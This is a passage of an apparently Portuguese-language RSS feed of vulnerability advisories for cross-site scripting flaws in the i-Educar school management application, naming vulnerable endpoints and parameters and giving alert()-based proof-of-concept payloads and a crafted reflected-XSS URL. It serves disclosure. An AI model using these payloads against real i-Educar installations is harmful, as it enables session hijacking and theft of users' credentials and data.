&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;CVE&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Hunters&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8346/image.png&amp;#34;
	width=&amp;#34;2226&amp;#34;
	height=&amp;#34;1408&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8346/image_hu_4ad20b410643cee4.png 480w, /p/cve-2025-8346/image_hu_8466039bf764aed0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;158&amp;#34;
		data-flex-basis=&amp;#34;379px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload-completo&amp;#34;&amp;gt;Payload Completo:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  https://localhost/intranet/educar_aluno_lst.php?ref_cod_matricula=&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;20src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x%20onerror=alert(%27CVE-Hunters%27)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8346.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8346.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8365</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8365/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8365/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8365-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-atendidos_cadphp&amp;#34;&amp;gt;CVE-2025-8365: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;atendidos_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8365&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8365&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;atendidos_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;nome_social&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;atendidos_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8365-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-atendidos_cadphp&amp;#34;&amp;gt;CVE-2025-8365: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;atendidos_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8365&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8365&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;atendidos_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;nome_social&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;atendidos_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;nome_social&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;nome_social&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8365/image.png&amp;#34;
	width=&amp;#34;1229&amp;#34;
	height=&amp;#34;332&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8365/image_hu_cfca56083774b524.png 480w, /p/cve-2025-8365/image_hu_3fab16a5d252a9b8.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parâmetro nome&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;370&amp;#34;
		data-flex-basis=&amp;#34;888px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8365/image-1.png&amp;#34;
	width=&amp;#34;1208&amp;#34;
	height=&amp;#34;350&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8365/image-1_hu_4f88faef3bff0085.png 480w, /p/cve-2025-8365/image-1_hu_a097317291baef5.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parâmetro nome_social&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;345&amp;#34;
		data-flex-basis=&amp;#34;828px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8365/image-2.png&amp;#34;
	width=&amp;#34;1229&amp;#34;
	height=&amp;#34;342&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8365/image-2_hu_23eddbd5b1dbebb0.png 480w, /p/cve-2025-8365/image-2_hu_7c7b2bc555309126.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parâmetro email&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;359&amp;#34;
		data-flex-basis=&amp;#34;862px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8365.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8365.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8366</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8366/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8366/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8366-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-educar_servidor_lstphp&amp;#34;&amp;gt;CVE-2025-8366: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;educar_servidor_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8366&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8366&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_servidor_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;matricula_sevidor&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_servidor_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;matricula_sevidor&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;matricula_sevidor&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8366-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-educar_servidor_lstphp&amp;#34;&amp;gt;CVE-2025-8366: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;educar_servidor_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8366&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8366&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_servidor_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;matricula_sevidor&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_servidor_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;matricula_sevidor&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;matricula_sevidor&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
